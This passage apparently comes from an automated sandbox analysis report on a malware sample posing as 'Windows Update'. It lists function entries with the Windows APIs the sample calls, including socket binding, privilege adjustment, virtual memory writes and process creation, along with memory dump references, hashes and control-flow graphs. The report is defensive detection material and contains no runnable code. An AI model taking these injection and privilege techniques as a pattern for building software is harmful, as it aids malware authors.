                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • bind.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00640E1B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: bind
                                                                                  • String ID:
                                                                                  • API String ID: 1187836755-0
                                                                                  • Opcode ID: 9c3025a5d53c8f969c2e30bcef19614978566771f8172a5000e89449af70141e
                                                                                  • Instruction ID: 6cfabaec72b4d03b8e9dfb29443daeb50c2715610eb1aa4239d2d143b13d2491
                                                                                  • Opcode Fuzzy Hash: 9c3025a5d53c8f969c2e30bcef19614978566771f8172a5000e89449af70141e
                                                                                  • Instruction Fuzzy Hash: 9C219175509380AFE712CB61DC44F96BFB8EF06310F08849BE944CB292D275A909CB75
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0064096C, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • listen.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00640A00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: listen
                                                                                  • String ID:
                                                                                  • API String ID: 3257165821-0
                                                                                  • Opcode ID: 6582d465e1e665ebc546972b1177416f52828f2a2815822845a345cbdabb84e5
                                                                                  • Instruction ID: e339eef02771f66e2e17cbe544e7b1b95a6bf91847623536a7b5734239b0b8f5
                                                                                  • Opcode Fuzzy Hash: 6582d465e1e665ebc546972b1177416f52828f2a2815822845a345cbdabb84e5
                                                                                  • Instruction Fuzzy Hash: 8421D6B5404384AFF712CB50DC45F96BFA8EF42324F09859AE9449F193D3746905C771
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00644F83, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00645003
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdjustPrivilegesToken
                                                                                  • String ID:
                                                                                  • API String ID: 2874748243-0
                                                                                  • Opcode ID: c125415af5997b7148adafb4ae916e64742145e1280b5e8cca85e587470e1256
                                                                                  • Instruction ID: 5a15bb9143d44990d3a9129b96463037d63e5c7840753ca7c436ae18fc3eca5e
                                                                                  • Opcode Fuzzy Hash: c125415af5997b7148adafb4ae916e64742145e1280b5e8cca85e587470e1256
                                                                                  • Instruction Fuzzy Hash: 2C21D1765097809FEB228F25DC45B92BFB4EF16310F0885DAE9858B663D371D908CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00642E72, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetAdaptersInfo.IPHLPAPI(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00642EF0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdaptersInfo
                                                                                  • String ID:
                                                                                  • API String ID: 3177971545-0
                                                                                  • Opcode ID: 45711f7d00cf33a0af7c1c46acb36a6c90ec3837c5aae7be711431d0ea4c6597
                                                                                  • Instruction ID: 7d58d6e000d53280ce87b43877077715c82ff208a61455e45c80176b9d96df1f
                                                                                  • Opcode Fuzzy Hash: 45711f7d00cf33a0af7c1c46acb36a6c90ec3837c5aae7be711431d0ea4c6597
                                                                                  • Instruction Fuzzy Hash: 7621B771409384AFE722CB11CC55F96FFB8EF46310F0885DBF9449B192C265A948CB72
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00640DBA, Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • bind.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00640E1B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: bind
                                                                                  • String ID:
                                                                                  • API String ID: 1187836755-0
                                                                                  • Opcode ID: 00e7234f5156e8bbf63f1330d227b70dc2491ed8d15ab262f54246e52ec87560
                                                                                  • Instruction ID: 77eff2167ed3141de8a2522768950857e68d596fc29c7d153567f9b4767f0177
                                                                                  • Opcode Fuzzy Hash: 00e7234f5156e8bbf63f1330d227b70dc2491ed8d15ab262f54246e52ec87560
                                                                                  • Instruction Fuzzy Hash: 0A11BF76500304EFFB20CF51DC85FA6FBA8EF04720F14886AEE089B241D670A954CAB5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00646AE5, Relevance: 1.6, APIs: 1, Instructions: 60nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 00646B50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryVirtualWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3527976591-0
                                                                                  • Opcode ID: f47ca7144207d34aa95ddc0e851e3c2240d293f6e8e96f8715a701b509f2bc46
                                                                                  • Instruction ID: d2ed8dfac410957edcd91c601935c74dfefe5afb9b02c4617abb7f8f2b41d9dc
                                                                                  • Opcode Fuzzy Hash: f47ca7144207d34aa95ddc0e851e3c2240d293f6e8e96f8715a701b509f2bc46
                                                                                  • Instruction Fuzzy Hash: 9E118471408380AFEB21CF55DC44BA2FFB4FF46360F08859AED848B152C376A458DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006409AA, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • listen.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00640A00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: listen
                                                                                  • String ID:
                                                                                  • API String ID: 3257165821-0
                                                                                  • Opcode ID: 5cca211827f425e0b15af838815455ca7afbd9383f8c2e8e6fbfccbed7c7c582
                                                                                  • Instruction ID: 7f04b24af0295ede871f8b365d4e904d3c120117aec5131259fce6460050f4a0
                                                                                  • Opcode Fuzzy Hash: 5cca211827f425e0b15af838815455ca7afbd9383f8c2e8e6fbfccbed7c7c582
                                                                                  • Instruction Fuzzy Hash: 4211E171500304EFFB21CF11DC85FAAFBA8EF44720F1484AAEE099B242D674A9458AB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00645145, Relevance: 1.6, APIs: 1, Instructions: 54nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 006451AD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: InformationQuerySystem
                                                                                  • String ID:
                                                                                  • API String ID: 3562636166-0
                                                                                  • Opcode ID: af361f19c396372719bbf425a882bd9d413d5b962b52c4c2fb6ec7a836f6d653
                                                                                  • Instruction ID: f3df6036617a068a7092d9964e4b51c9faf840cd46c18dcc9a0258e0d63c0045
                                                                                  • Opcode Fuzzy Hash: af361f19c396372719bbf425a882bd9d413d5b962b52c4c2fb6ec7a836f6d653
                                                                                  • Instruction Fuzzy Hash: B911BF71509780AFDB228F11DC45EA2FFB4EF06320F0984DAED854B663C275A918CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00642E9A, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetAdaptersInfo.IPHLPAPI(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00642EF0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdaptersInfo
                                                                                  • String ID:
                                                                                  • API String ID: 3177971545-0
                                                                                  • Opcode ID: f61dbd4e126d759adacf37be670db4e9fa8f0bdc7cb08b167aa1a351c2b755b2
                                                                                  • Instruction ID: a22e94537ee23e7bca88366942ed41b1aa17f14320afecbda6b45dc85a160536
                                                                                  • Opcode Fuzzy Hash: f61dbd4e126d759adacf37be670db4e9fa8f0bdc7cb08b167aa1a351c2b755b2
                                                                                  • Instruction Fuzzy Hash: C801F571500304EFFB21CF01DC85FA6FBA8EF04720F64849AFD089B281D675A949CAB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00644FBA, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00645003
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdjustPrivilegesToken
                                                                                  • String ID:
                                                                                  • API String ID: 2874748243-0
                                                                                  • Opcode ID: 35476ba088853992823f910b009aefdbb9a428b4508a77f6efc3e96a99627b52
                                                                                  • Instruction ID: e9f08b1e205cdb474a5ef0ba77990b159734031e1fa43359aceb83c17937c08a
                                                                                  • Opcode Fuzzy Hash: 35476ba088853992823f910b009aefdbb9a428b4508a77f6efc3e96a99627b52
                                                                                  • Instruction Fuzzy Hash: E611C236500700DFEB20CF55DC85B96FBE5EF04720F0884AAED4A8B652D771E808DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00646B12, Relevance: 1.5, APIs: 1, Instructions: 43nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 00646B50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryVirtualWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3527976591-0
                                                                                  • Opcode ID: 5ef36ee795f6b734ba68eb222e5411d66aa444dae645309b42558fda91f2a6b4
                                                                                  • Instruction ID: 60ba0a7f5d5a406cdc9851907bfadc69893c82c8e935749e4f988c77dc583f87
                                                                                  • Opcode Fuzzy Hash: 5ef36ee795f6b734ba68eb222e5411d66aa444dae645309b42558fda91f2a6b4
                                                                                  • Instruction Fuzzy Hash: 5801B171400700DFEB21CF55DC85B96FFA1EF15320F0884AAED498B622C372A418DBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011A09A, Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: recv
                                                                                  • String ID:
                                                                                  • API String ID: 1507349165-0
                                                                                  • Opcode ID: 99fdd81276d448ed5d5848b7c1b215b626990d86f2ac74e282c73ba1d2081be0
                                                                                  • Instruction ID: b21d5d3106c9f44d25fdedfb88a3295195848cabce099f231fd6fd344d7b237e
                                                                                  • Opcode Fuzzy Hash: 99fdd81276d448ed5d5848b7c1b215b626990d86f2ac74e282c73ba1d2081be0
                                                                                  • Instruction Fuzzy Hash: 2C01DF71501740DFEB20CF55DD84BA6FFA0EF08320F48C4AAED498B612D372A488DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00646A6A, Relevance: 1.5, APIs: 1, Instructions: 40nativethreadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ResumeThread
                                                                                  • String ID:
                                                                                  • API String ID: 947044025-0
                                                                                  • Opcode ID: e22cd93fb48cf7e5b7bd124cffe9b0b7bd86feb3790976a58e837621f947f197
                                                                                  • Instruction ID: eaf4f32f865a33ed2968dc352799ff1e515001f563ba765aecf65a921af9f3df
                                                                                  • Opcode Fuzzy Hash: e22cd93fb48cf7e5b7bd124cffe9b0b7bd86feb3790976a58e837621f947f197
                                                                                  • Instruction Fuzzy Hash: A601AD75500740DFEB20CF55DC89BA5FFA5EF05720F18C8AAED099B212D276A848CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00645172, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 006451AD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: InformationQuerySystem
                                                                                  • String ID:
                                                                                  • API String ID: 3562636166-0
                                                                                  • Opcode ID: d7c9f69d801f9b97c3fd1db4a49af56689b64652129667f94899e5ba283f9452
                                                                                  • Instruction ID: 44e11ad0efc612a84c6763e894568220afb439f029fca35b5bd62c498e079f50
                                                                                  • Opcode Fuzzy Hash: d7c9f69d801f9b97c3fd1db4a49af56689b64652129667f94899e5ba283f9452
                                                                                  • Instruction Fuzzy Hash: E9018B35400B40DFEB208F45D884B65FBA1EF04720F18849ADD4A0B612C272A818DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00643C20, Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1773 643c20-643c4f 1774 643c81-643c85 1773->1774 1775 643c51-643c74 1773->1775 1776 643c86-643d47 1774->1776 1775->1776 1777 643c76-643c7f 1775->1777 1783 643d99-643d9e 1776->1783 1784 643d49-643d51 getaddrinfo 1776->1784 1777->1774 1783->1784 1785 643d57-643d69 1784->1785 1787 643da0-643da5 1785->1787 1788 643d6b-643d96 1785->1788 1787->1788
                                                                                  APIs
                                                                                  • getaddrinfo.WS2_32(?,00000E40), ref: 00643D4F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: getaddrinfo
                                                                                  • String ID:
                                                                                  • API String ID: 300660673-0
                                                                                  • Opcode ID: 77127358b6a68896e58545f69365bfaff5c4b7e4c93d407213151c9b2390897b
                                                                                  • Instruction ID: f9b81877742fe15731c08135f43ea38ee0d52354702c0bc144b0b97cafee3eaa
                                                                                  • Opcode Fuzzy Hash: 77127358b6a68896e58545f69365bfaff5c4b7e4c93d407213151c9b2390897b
                                                                                  • Instruction Fuzzy Hash: BF51507150D3C0AFE7238B208C55BA6BFB8AF07214F0A45DBE584DF1A3D6695909C772
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006431DC, Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2199 6431dc-6432b7 2205 6432bc-6432c5 2199->2205 2206 6432b9 2199->2206 2207 6432c7-6432cf getnameinfo 2205->2207 2208 64331f-643324 2205->2208 2206->2205 2209 6432d5-6432e7 2207->2209 2208->2207 2211 643326-64332b 2209->2211 2212 6432e9-64331c 2209->2212 2211->2212
                                                                                  APIs
                                                                                  • getnameinfo.WS2_32(?,00000E40), ref: 006432CD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: getnameinfo
                                                                                  • String ID:
                                                                                  • API String ID: 1866240144-0
                                                                                  • Opcode ID: 42e4236ba361668cfd1d94778cfb954d9f430c795b2d84de5042528976df737d
                                                                                  • Instruction ID: 27f617282ffb8bd6ab1eeda40cd7dfe0a88cd359d7eaaefac81a6ba7b2182233
                                                                                  • Opcode Fuzzy Hash: 42e4236ba361668cfd1d94778cfb954d9f430c795b2d84de5042528976df737d
                                                                                  • Instruction Fuzzy Hash: 944171724083846FE722CB658C91FA6BFB8EF07310F0944DBE984CB1A3D6659A09C771
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011B729, Relevance: 1.6, APIs: 1, Instructions: 112registryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2217 11b729-11b733 2218 11b735-11b74c 2217->2218 2219 11b74d-11b75b 2217->2219 2218->2219 2221 11b77d-11b7af 2219->2221 2222 11b75d-11b77c 2219->2222 2225 11b7b2-11b80a RegQueryValueExW 2221->2225 2222->2221 2227 11b810-11b826 2225->2227
                                                                                  APIs
                                                                                  • RegQueryValueExW.KERNEL32(?,00000E40,?,?), ref: 0011B802
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  • Opcode ID: 25e7a7b442c54d16ab0e256aa063adcf63cbe9718eb1dbcc6cc3bcc981f23c99
                                                                                  • Instruction ID: 99fb200ba8c645813a02644d71f7bb7819d111b206e78cfb65b13dd96c165b35
                                                                                  • Opcode Fuzzy Hash: 25e7a7b442c54d16ab0e256aa063adcf63cbe9718eb1dbcc6cc3bcc981f23c99
                                                                                  • Instruction Fuzzy Hash: 4141492540E3C0AFD3139B358C65A61BFB4EF47620F0E85DBD8848F5A3D2296919D7B2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006468E0, Relevance: 1.6, APIs: 1, Instructions: 108processCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2228 6468e0-646946 2231 646948 2228->2231 2232 64694b-646951 2228->2232 2231->2232 2233 646956-6469c8 2232->2233 2234 646953 2232->2234 2238 646a15-646a1a 2233->2238 2239 6469ca-6469d2 CreateProcessA 2233->2239 2234->2233 2238->2239 2240 6469d8-6469ea 2239->2240 2242 646a1c-646a21 2240->2242 2243 6469ec-646a12 2240->2243 2242->2243
                                                                                  APIs
                                                                                  • CreateProcessA.KERNEL32(?,00000E40), ref: 006469D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateProcess
                                                                                  • String ID:
                                                                                  • API String ID: 963392458-0
                                                                                  • Opcode ID: e276b06628f5927942808ca915414a27fbd4e589bfc38fe8b6c9bf82fb0b92db
                                                                                  • Instruction ID: fcdba9f5328f618fa480e8311c6c7e2f75dd2b6023d5261a4f402e14cbaf449e
                                                                                  • Opcode Fuzzy Hash: e276b06628f5927942808ca915414a27fbd4e589bfc38fe8b6c9bf82fb0b92db
                                                                                  • Instruction Fuzzy Hash: EC319D72200341AFEB21CF55CC41FA7BBECEF09710F0485AAFA859A191D776E948CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0064342C, Relevance: 1.6, APIs: 1, Instructions: 106networkCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2246 64342c-64344a 2247 643450-6434c2 2246->2247 2248 6434c3-6434d7 2246->2248 2247->2248 2252 6434dc-6434e5 2248->2252 2253 6434d9 2248->2253 2254 6434e7 2252->2254 2255 6434ea-6434f9 2252->2255 2253->2252 2254->2255 2256 64353d-643542 2255->2256 2257 6434fb-643503 WSAIoctl 2255->2257 2256->2257 2258 643509-64351b 2257->2258 2260 643544-643549 2258->2260 2261 64351d-64353a 2258->2261 2260->2261
                                                                                  APIs
                                                                                  • WSAIoctl.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00643501
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Ioctl
                                                                                  • String ID:
                                                                                  • API String ID: 3041054344-0
                                                                                  • Opcode ID: e131be84c83574c0e2459e0c835c220d721f94acd2412c739abc8551dec6bb5f
                                                                                  • Instruction ID: ca75c0c106e70da863ce2dcbef1f4a0255b92e545aa267974936c5f99f668618
                                                                                  • Opcode Fuzzy Hash: e131be84c83574c0e2459e0c835c220d721f94acd2412c739abc8551dec6bb5f
                                                                                  • Instruction Fuzzy Hash: 4D4181715097C09FE723CB208C54F92BFB8EF06714F0985DBE985CB5A3D225A909C761
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006449BE, Relevance: 1.6, APIs: 1, Instructions: 106windowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2264 6449be-644a6d 2266 644a72-644a78 2264->2266 2267 644a6f 2264->2267 2268 644a7d-644a89 2266->2268 2269 644a7a 2266->2269 2267->2266 2270 644ab6-644abb 2268->2270 2271 644a8b-644a9e MessageBoxW 2268->2271 2269->2268 2270->2271 2272 644aa0-644ab3 2271->2272 2273 644abd-644ac2 2271->2273 2273->2272
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message
                                                                                  • String ID:
                                                                                  • API String ID: 2030045667-0
                                                                                  • Opcode ID: dabfcdbc7eca5e8ff5f95596ccfcc709325fc336703b44a4a2400d0cb5bc829f
                                                                                  • Instruction ID: c4e2a37fc80df7ecbca95d4614b1491eaa6daae7450d189f7833e67e287a34af
                                                                                  • Opcode Fuzzy Hash: dabfcdbc7eca5e8ff5f95596ccfcc709325fc336703b44a4a2400d0cb5bc829f
                                                                                  • Instruction Fuzzy Hash: F3415C6554E3C05FE7138B358C65AA2BFB5AF13214B0E84DBD8C4CF2A3D6199849C772
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00643712, Relevance: 1.6, APIs: 1, Instructions: 100registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 006437C9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  • Opcode ID: 63d23898a0aa0a745c155c9ecf751d82f3ee1862e88177cad84858a642f8662e
                                                                                  • Instruction ID: 1d0c23327bb8a2d6d061bc39764f2e77ec8387bfdc69e912be6b0a43bd8b6c31
                                                                                  • Opcode Fuzzy Hash: 63d23898a0aa0a745c155c9ecf751d82f3ee1862e88177cad84858a642f8662e
                                                                                  • Instruction Fuzzy Hash: FC3181B2504344AFEB22CF60DC44FA7BFACEF05760F04859AF9849B242D665A909CB71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0064332D, Relevance: 1.6, APIs: 1, Instructions: 99windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FormatMessageW.KERNEL32(?,00000E40,?,?), ref: 006433F6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FormatMessage
                                                                                  • String ID:
                                                                                  • API String ID: 1306739567-0
                                                                                  • Opcode ID: 8395219d947ef305200b91d0a3241063da72ebb9089101a82a2f9f8f87beb126
                                                                                  • Instruction ID: 9634e4342ca709ece3b47cc9ba6677cce3e8b693f53c51ba3f15379f2a7e61be
                                                                                  • Opcode Fuzzy Hash: 8395219d947ef305200b91d0a3241063da72ebb9089101a82a2f9f8f87beb126
                                                                                  • Instruction Fuzzy Hash: 6F316B7150E3C05FD7138B758C61AA6BFB4AF47610F1A80DBD8848F2A3D625691AC7B2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011BBF3, Relevance: 1.6, APIs: 1, Instructions: 98fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 0011BCA9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: d95bb9d6ff6b10e4f8ad2b8cf8b91d22d1bdc7415fb3db2c0382e21a8b60afab
                                                                                  • Instruction ID: 1ef07435c5abc6a73f5eda86507b36a2f2bbd1fdea673a78fb0a72d86a682523
                                                                                  • Opcode Fuzzy Hash: d95bb9d6ff6b10e4f8ad2b8cf8b91d22d1bdc7415fb3db2c0382e21a8b60afab
                                                                                  • Instruction Fuzzy Hash: 633184B1505340AFE722CF25DD45FA2BFE8EF05314F0844AEE9848B152D775A909CB71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00646906, Relevance: 1.6, APIs: 1, Instructions: 97processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
